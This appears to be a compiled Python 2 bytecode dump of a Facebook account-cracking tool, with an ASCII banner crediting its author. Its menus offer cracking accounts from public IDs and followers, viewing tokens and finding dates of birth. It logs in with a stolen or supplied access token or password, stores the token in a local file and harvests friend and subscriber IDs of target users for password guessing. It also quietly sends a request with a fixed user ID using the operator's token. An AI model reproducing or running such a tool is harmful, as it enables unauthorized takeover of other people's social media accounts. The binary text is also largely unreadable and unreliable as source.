"\n\n\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91 \xe2\x97\x8d\xe2\x9e\xa4 ADMIN 
\xe2\x84\xa2\n\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x97\x8d\xe2\x9e\xa4 COMUNITAS\n\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x97\x8d\xe2\x9e\xa4 GARANGAN\n\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x97\x8d\xe2\x9e\xa4 ALAY\n\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x97\x8d\xe2\x9e\xa4 
INDONESIA\n\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x97\x8d\xe2\x9e\xa4 C.G.A.I\n\n===============================================\n\n\xe2\x97\x8d\xe2\x9e\xa4 Codded By : \xe2\x98\x86 RAKA \xe2\x98\x86 \xe2\x84\xa2\xef\xb8\xbb\xc2\xae\xe2\x95\xa4\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\x90\xe2\x97\x8d\xe2\x9e\xa4\n\xe2\x97\x8d\xe2\x9e\xa4 Facebook : Raka Andrian Tara\n\xe2\x97\x8d\xe2\x9e\xa4 Instagram : raka_andrian27\n\xe2\x97\x8d\xe2\x9e\xa4 Youtube : YouTube Channel Bangsat-XD\n\n===============================================" | lolcat(\x02\x00\x00\x00t\x02\x00\x00\x00ost\x06\x00\x00\x00system(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x04\x00\x00\x00logo5\x00\x00\x00s\x02\x00\x00\x00\x00\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s=\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHd\x03\x00GHd\x02\x00GHd\x04\x00GHd\x05\x00GHd\x02\x00GHt\x03\x00\x83\x00\x00\x01d\x00\x00S(\x06\x00\x00\x00NR\x01\x00\x00\x00t\x00\x00\x00\x00s$\x00\x00\x00\t \x1b[1;34mClone Method Menu\x1b[0;97ms\x17\x00\x00\x00\x1b[1;96m[1] B-api (Fast)s\x14\x00\x00\x00\x1b[1;96m[2] 
Localhost(\x04\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00t\x12\x00\x00\x00method_menu_select(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x0b\x00\x00\x00method_menu7\x00\x00\x00s\x12\x00\x00\x00\x00\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sR\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r"\x00t\x01\x00\x83\x00\x00\x01n,\x00|\x00\x00d\x03\x00k\x02\x00r8\x00t\x02\x00\x83\x00\x00\x01n\x16\x00d\x04\x00GHd\x05\x00GHd\x04\x00GHt\x03\x00\x83\x00\x00\x01d\x00\x00S(\x06\x00\x00\x00Ns\x13\x00\x00\x00 Choose method >>> t\x01\x00\x00\x001t\x01\x00\x00\x002R\t\x00\x00\x00s\'\x00\x00\x00\t \x1b[1;35mSelect valid option \x1b[0;97m(\x04\x00\x00\x00t\t\x00\x00\x00raw_inputt\x06\x00\x00\x00b_menut\x06\x00\x00\x00l_menuR\n\x00\x00\x00(\x01\x00\x00\x00t\x04\x00\x00\x00afza(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R\n\x00\x00\x00A\x00\x00\x00s\x12\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sI\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHd\x03\x00t\x03\x00\x17d\x04\x00\x17t\x04\x00\x17GHd\x02\x00GHd\x05\x00GHd\x06\x00GHd\x02\x00GHt\x05\x00\x83\x00\x00\x01d\x00\x00S(\x07\x00\x00\x00NR\x01\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\r\x00\x00\x00FB Login MenusH\x00\x00\x00\x1b[1;92m[1] \xe2\x98\x86 ENTER TOKEN \xe2\x98\x86 \xe2\x84\xa2\xef\xb8\xbb\xc2\xae\xe2\x95\xa4\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\x90\xe2\x97\x8d\xe2\x9e\xa4s\x18\x00\x00\x00\x1b[1;92m[2] ID/Pass 
login(\x06\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00t\x01\x00\x00\x00ct\x02\x00\x00\x00c2t\x0c\x00\x00\x00login_select(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x05\x00\x00\x00loginL\x00\x00\x00s\x12\x00\x00\x00\x00\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x07\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00sR\x01\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\x16\x01t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHd\x05\x00GHd\x04\x00GHt\x00\x00d\x06\x00\x83\x01\x00}\x01\x00t\x04\x00d\x07\x00d\x08\x00\x83\x02\x00}\x02\x00|\x02\x00j\x05\x00|\x01\x00\x83\x01\x00\x01|\x02\x00j\x06\x00\x83\x00\x00\x01yl\x00t\x07\x00j\x08\x00d\t\x00|\x01\x00\x17\x83\x01\x00}\x03\x00t\t\x00j\n\x00|\x03\x00j\x0b\x00\x83\x01\x00}\x04\x00|\x04\x00d\n\x00\x19}\x05\x00|\x05\x00j\x0c\x00d\x0b\x00\x83\x01\x00d\x0c\x00\x19}\x06\x00d\x04\x00GHd\r\x00|\x06\x00\x17d\x0e\x00\x17GHt\r\x00j\x0e\x00d\x0f\x00\x83\x01\x00\x01t\x0f\x00\x83\x00\x00\x01WqN\x01\x04t\x10\x00t\x11\x00f\x02\x00k\n\x00r\x12\x01\x01\x01\x01d\x04\x00GHd\x10\x00GHd\x04\x00GHt\x00\x00d\x11\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01qN\x01Xn8\x00|\x00\x00d\x12\x00k\x02\x00r,\x01t\x13\x00\x83\x00\x00\x01n"\x00d\x04\x00GHd\x13\x00t\x14\x00\x17d\x14\x00\x17t\x15\x00\x17GHd\x04\x00GHt\x16\x00\x83\x00\x00\x01d\x00\x00S(\x15\x00\x00\x00Ns\x19\x00\x00\x00 Choose login method >>> R\x0c\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s!\x00\x00\x00\t \x1b[1;32mFB Token Login\x1b[0;97ms\x19\x00\x00\x00\x1b[1;95mPast token here : s\r\x00\x00\x00.fb_token.txtt\x01\x00\x00\x00ws+\x00\x00\x00https://graph.facebook.com/me?access_token=t\x04\x00\x00\x00namet\x01\x00\x00\x00 i\x00\x00\x00\x00s\x1d\x00\x00\x00\t\x1b[1;32mToken logged in as : s\x07\x00\x00\x00\x1b[0;97mi\x03\x00\x00\x00s"\x00\x00\x00\t \x1b[1;31mToken not valid\x1b[0;97ms \x00\x00\x00\x1b[1;92mPress enter to try again 
R\r\x00\x00\x00s\x05\x00\x00\x00\t s\x13\x00\x00\x00Select valid method(\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00t\x04\x00\x00\x00opent\x05\x00\x00\x00writet\x05\x00\x00\x00closet\x08\x00\x00\x00requestst\x03\x00\x00\x00gett\x04\x00\x00\x00jsont\x05\x00\x00\x00loadst\x04\x00\x00\x00textt\x06\x00\x00\x00rsplitt\x04\x00\x00\x00timet\x05\x00\x00\x00sleepR\x0b\x00\x00\x00t\x08\x00\x00\x00KeyErrort\x07\x00\x00\x00IOErrorR\x15\x00\x00\x00t\x08\x00\x00\x00login_fbR\x12\x00\x00\x00R\x13\x00\x00\x00R\x14\x00\x00\x00(\x07\x00\x00\x00R\x11\x00\x00\x00t\x05\x00\x00\x00tokent\x07\x00\x00\x00token_st\x01\x00\x00\x00rt\x01\x00\x00\x00qR\x17\x00\x00\x00t\x02\x00\x00\x00nm(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R\x14\x00\x00\x00V\x00\x00\x00s@\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x0f\x01\r\x01\n\x01\x03\x01\x13\x01\x12\x01\n\x01\x13\x01\x05\x01\r\x01\r\x01\x0b\x01\x13\x01\x05\x01\x05\x01\x05\x01\n\x01\x0e\x01\x0c\x01\n\x02\x05\x01\x11\x01\x05\x01c\x00\x00\x00\x00\x08\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00sw\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHd\x03\x00GHd\x02\x00GHt\x03\x00d\x04\x00\x83\x01\x00}\x00\x00|\x00\x00j\x04\x00d\x05\x00d\x02\x00\x83\x02\x00}\x01\x00|\x01\x00j\x04\x00d\x06\x00d\x02\x00\x83\x02\x00}\x02\x00|\x02\x00j\x04\x00d\x07\x00d\x02\x00\x83\x02\x00}\x03\x00t\x03\x00d\x08\x00\x83\x01\x00}\x04\x00d\x02\x00GHt\x05\x00j\x06\x00d\t\x00|\x03\x00\x17d\n\x00\x17|\x04\x00\x17d\x0b\x00t\x07\x00\x83\x01\x01j\x08\x00}\x05\x00t\t\x00j\n\x00|\x05\x00\x83\x01\x00}\x06\x00d\x0c\x00|\x06\x00k\x06\x00r\x1d\x01t\x0b\x00d\r\x00d\x0e\x00\x83\x02\x00}\x07\x00|\x07\x00j\x0c\x00|\x06\x00d\x0c\x00\x19\x83\x01\x00\x01|\x07\x00j\r\x00\x83\x00\x00\x01t\x05\x00j\x0e\x00d\x0f\x00|\x06\x00d\x0c\x00\x19\x17\x83\x01\x00\x01t\x0f\x00j\x10\x00d\x10\x00\x83\x01\x00\x01d\x11\x00GHt\x0f\x00j\x10\x00d\x10\x00\x83\x01\x00\x01t\x11\x00\x83\x
00\x00\x01nV\x00d\x12\x00|\x06\x00d\x13\x00\x19k\x06\x00rX\x01d\x14\x00GHd\x02\x00GHt\x0f\x00j\x10\x00d\x10\x00\x83\x01\x00\x01t\x03\x00d\x15\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x1b\x00d\x16\x00GHd\x02\x00GHt\x03\x00d\x15\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01d\x00\x00S(\x17\x00\x00\x00NR\x01\x00\x00\x00R\t\x00\x00\x00s#\x00\x00\x00\t \x1b[1;32mFB ID/PASS Login\x1b[0;97ms\x0f\x00\x00\x00 ID/Mail/Num : R\x18\x00\x00\x00t\x01\x00\x00\x00(t\x01\x00\x00\x00)s\x0e\x00\x00\x00 Password : s\x1e\x00\x00\x00http://localhost:5000/auth?id=s\x06\x00\x00\x00&pass=t\x07\x00\x00\x00headerst\x03\x00\x00\x00locs\r\x00\x00\x00.fb_token.txtR\x16\x00\x00\x00sG\x00\x00\x00https://graph.facebook.com/me/friends?uid=100000395779504&access_token=i\x01\x00\x00\x00s)\x00\x00\x00\t \x1b[1;31mLogged in successfully\x1b[0;97ms\x10\x00\x00\x00www.facebook.comt\x05\x00\x00\x00errors8\x00\x00\x00\t \x1b[1;31mUser must verify account before login\x1b[0;97ms \x00\x00\x00\x1b[1;93mPress enter to try again s.\x00\x00\x00\t\x1b[1;31mID/Number/Password may be wrong\x1b[0;97m(\x13\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x0e\x00\x00\x00t\x07\x00\x00\x00replaceR\x1c\x00\x00\x00R\x1d\x00\x00\x00t\x06\x00\x00\x00headerR 
\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R\x19\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00t\x04\x00\x00\x00postR"\x00\x00\x00R#\x00\x00\x00R\x0b\x00\x00\x00R&\x00\x00\x00(\x08\x00\x00\x00t\x02\x00\x00\x00idt\x03\x00\x00\x00id1t\x03\x00\x00\x00id2t\x03\x00\x00\x00uidt\x03\x00\x00\x00pwdt\x04\x00\x00\x00dataR*\x00\x00\x00t\x05\x00\x00\x00hamza(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R&\x00\x00\x00x\x00\x00\x00s@\x00\x00\x00\x00\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x12\x01\x12\x01\x12\x01\x0c\x01\x05\x01$\x01\x0f\x01\x0c\x01\x0f\x01\x11\x01\n\x01\x15\x01\r\x01\x05\x01\r\x01\n\x01\x10\x01\x05\x01\x05\x01\r\x01\n\x01\n\x02\x05\x01\x05\x01\n\x01c\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xad\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01y\x19\x00t\x03\x00d\x02\x00d\x03\x00\x83\x02\x00j\x04\x00\x83\x00\x00a\x05\x00Wn\x1e\x00\x04t\x06\x00t\x07\x00f\x02\x00k\n\x00rM\x00\x01\x01\x01t\x08\x00\x83\x00\x00\x01n\x01\x00XyL\x00t\t\x00j\n\x00d\x04\x00t\x05\x00\x17\x83\x01\x00}\x00\x00t\x0b\x00j\x0c\x00|\x00\x00j\r\x00\x83\x01\x00}\x01\x00|\x01\x00d\x05\x00\x19}\x02\x00|\x02\x00j\x0e\x00d\x06\x00\x83\x01\x00d\x07\x00\x19}\x03\x00|\x03\x00}\x04\x00Wn\x9d\x00\x04t\x06\x00t\x07\x00f\x02\x00k\n\x00r\xef\x00\x01\x01\x01d\x08\x00GHd\t\x00t\x0f\x00\x17d\n\x00\x17t\x10\x00\x17GHd\x08\x00GHt\x00\x00j\x01\x00d\x0b\x00\x83\x01\x00\x01t\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01nK\x00\x04t\t\x00j\x13\x00j\x14\x00k\n\x00r9\x01\x01\x01\x01t\x02\x00\x83\x00\x00\x01d\x08\x00GHd\r\x00GHd\x08\x00GHt\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00\x01t\x15\x00d\x0e\x00\x83\x01\x00\x01t\x16\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x08\x00GHd\x0f\x00t\x0f\x00\x17d\x10\x00\x17|\x04\x00\x17t\x10\x00\x17GHd\x08\x00GHt\x00\x00j\x01\x00d\x11\x00\x83\x01\x00\x01d\x08\x00GHd\x12\x00GHd\x13\x00GHd\x14\x00GHd\x15\x00GHd\x16\x00GHd\x17\x00GHd\x0
8\x00GHt\x17\x00\x83\x00\x00\x01d\x00\x00S(\x18\x00\x00\x00NR\x01\x00\x00\x00s\r\x00\x00\x00.fb_token.txtR)\x00\x00\x00s+\x00\x00\x00https://graph.facebook.com/me?access_token=R\x17\x00\x00\x00R\x18\x00\x00\x00i\x00\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\x11\x00\x00\x00ID has checkpoints\x14\x00\x00\x00rm -rf .fb_token.txti\x01\x00\x00\x00s;\x00\x00\x00\t \x1b[1;31m\xe2\x9d\xa4\xef\xb8\x8fTurn on mobile data OR wifi\xe2\x9d\xa4\xef\xb8\x8f \x1b[0;97ms\'\x00\x00\x00\x1b[1;93mPress enter to try again \x1b[0;97ms\x03\x00\x00\x00\t s\x0e\x00\x00\x00Logged In UsersA\x00\x00\x00echo -e "-----------------------------------------------"| lolcats\x1f\x00\x00\x00\x1b[1;93m[1] Crack from public ids\x1f\x00\x00\x00\x1b[1;93m[2] Crack from followerss\x15\x00\x00\x00\x1b[1;93m[3] View tokens\x1d\x00\x00\x00\x1b[1;93m[4] Find date of births\x1d\x00\x00\x00\x1b[1;93m[5] Return method menus\x11\x00\x00\x00\x1b[1;93m[6] Logout(\x18\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x19\x00\x00\x00t\x04\x00\x00\x00readR\'\x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R\x15\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R 
\x00\x00\x00R!\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00R"\x00\x00\x00R#\x00\x00\x00t\n\x00\x00\x00exceptionsR\x02\x00\x00\x00R\x0e\x00\x00\x00R\x0f\x00\x00\x00t\r\x00\x00\x00b_menu_select(\x05\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R+\x00\x00\x00t\x03\x00\x00\x00nmft\x02\x00\x00\x00ok(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R\x0f\x00\x00\x00\x9a\x00\x00\x00sT\x00\x00\x00\x00\x02\r\x01\x07\x01\x03\x01\x19\x01\x13\x01\x0b\x01\x03\x01\x13\x01\x12\x01\n\x01\x13\x01\n\x01\x13\x01\x05\x01\x11\x01\x05\x01\r\x01\r\x01\n\x01\x13\x01\x07\x01\x05\x01\x05\x01\x05\x01\r\x01\n\x01\x0b\x01\r\x01\x07\x01\x05\x01\x15\x01\x05\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x06\x00\x00\x00\x03\x00\x00\x00s\x9d\x04\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00g\x00\x00}\x01\x00g\x00\x00\x89\x01\x00g\x00\x00\x89\x00\x00|\x00\x00d\x02\x00k\x02\x00r\xb0\x01t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x05\x00\x83\x01\x00\x01d\x04\x00GHt\x00\x00d\x06\x00\x83\x01\x00}\x02\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x07\x00\x83\x01\x00\x01d\x04\x00GHyi\x00t\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\t\x00\x17t\x06\x00\x17\x83\x01\x00}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x04\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x05\x00\x83\x01\x00\x01d\x04\x00GHd\n\x00|\x04\x00d\x0b\x00\x19\x17GHWn7\x00\x04t\n\x00t\x0b\x00f\x02\x00k\n\x00r.\x01\x01\x01\x01d\x04\x00GHd\x0c\x00GHd\x04\x00GHt\x00\x00d\r\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\x0e\x00\x17t\x06\x00\x17\x83\x01\x00}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x05\x00xm\x02|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\r\x00d\x11\x00\x83\x01\x
00d\x12\x00\x19}\t\x00|\x01\x00j\x0e\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01qg\x01Wn\x1c\x02|\x00\x00d\x14\x00k\x02\x00rR\x03t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x15\x00\x83\x01\x00\x01d\x04\x00GHt\x00\x00d\x16\x00\x83\x01\x00}\x02\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x07\x00\x83\x01\x00\x01d\x04\x00GHyo\x00t\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\t\x00\x17t\x06\x00\x17d\x17\x00t\x0f\x00\x83\x01\x01}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x04\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x15\x00\x83\x01\x00\x01d\x04\x00GHd\x18\x00|\x04\x00d\x0b\x00\x19\x17GHWn7\x00\x04t\n\x00t\x0b\x00f\x02\x00k\n\x00r\xc6\x02\x01\x01\x01d\x04\x00GHd\x0c\x00GHd\x04\x00GHt\x00\x00d\r\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\x19\x00\x17t\x06\x00\x17d\x1a\x00\x17d\x17\x00t\x0f\x00\x83\x01\x01}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x05\x00x\xcb\x00|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\r\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0e\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01q\t\x03Wnz\x00|\x00\x00d\x1b\x00k\x02\x00rh\x03t\x10\x00\x83\x00\x00\x01nd\x00|\x00\x00d\x1c\x00k\x02\x00r~\x03t\x11\x00\x83\x00\x00\x01nN\x00|\x00\x00d\x1d\x00k\x02\x00r\x94\x03t\x12\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x1e\x00k\x02\x00r\xaa\x03t\x13\x00\x83\x00\x00\x01n"\x00d\x04\x00GHd\x1f\x00t\x14\x00\x17d 
\x00\x17t\x15\x00\x17GHd\x04\x00GHt\x16\x00\x83\x00\x00\x01d!\x00t\x17\x00t\x18\x00|\x01\x00\x83\x01\x00\x83\x01\x00\x17GHt\x19\x00j\x1a\x00d"\x00\x83\x01\x00\x01d#\x00GHd\x04\x00GHd$\x00d%\x00\x14GHd\x04\x00GH\x87\x00\x00\x87\x01\x00f\x02\x00d&\x00\x86\x00\x00}\n\x00t\x1b\x00d\'\x00\x83\x01\x00}\x0b\x00|\x0b\x00j\x1c\x00|\n\x00|\x01\x00\x83\x02\x00\x01d\x11\x00GHd$\x00d%\x00\x14GHd\x04\x00GHd(\x00GHd)\x00t\x17\x00t\x18\x00\x88\x00\x00\x83\x01\x00\x83\x01\x00\x17d*\x00\x17t\x17\x00t\x18\x00\x88\x01\x00\x83\x01\x00\x83\x01\x00\x17GHd\x04\x00GHd$\x00d%\x00\x14GHd\x04\x00GHt\x00\x00d+\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01d\x00\x00S(,\x00\x00\x00Ns\x13\x00\x00\x00\nChoose Option >>> R\x0c\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s(\x00\x00\x00echo -e "\t CRACK Public ID " | lolcats\x16\x00\x00\x00\x1b[1;93mPut Id/user : s.\x00\x00\x00echo -e "\t Gathering Information " | lolcats\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s\x15\x00\x00\x00\x1b[1;93mTarget user : R\x17\x00\x00\x00s0\x00\x00\x00\n\t \x1b[1;31m Logged in id has checkpoint\x1b[0;97ms\x15\x00\x00\x00\nPress enter to back s\x16\x00\x00\x00/friends?access_token=R9\x00\x00\x00R4\x00\x00\x00R\x18\x00\x00\x00i\x00\x00\x00\x00t\x01\x00\x00\x00|R\r\x00\x00\x00s*\x00\x00\x00echo -e "\t Followers Cloning " | lolcats\x15\x00\x00\x00\x1b[1;92mPut Id/user : R.\x00\x00\x00s\x0e\x00\x00\x00Target user : s\x1a\x00\x00\x00/subscribers?access_token=s\x0b\x00\x00\x00&limit=5000t\x01\x00\x00\x003t\x01\x00\x00\x004t\x01\x00\x00\x005t\x01\x00\x00\x006s\x05\x00\x00\x00\t s\x13\x00\x00\x00Select valid methods\r\x00\x00\x00Total IDs : g\x00\x00\x00\x00\x00\x00\xe0?s:\x00\x00\x00\x1b[1;94mSILAHKAN DI TUNGGU process is running in 
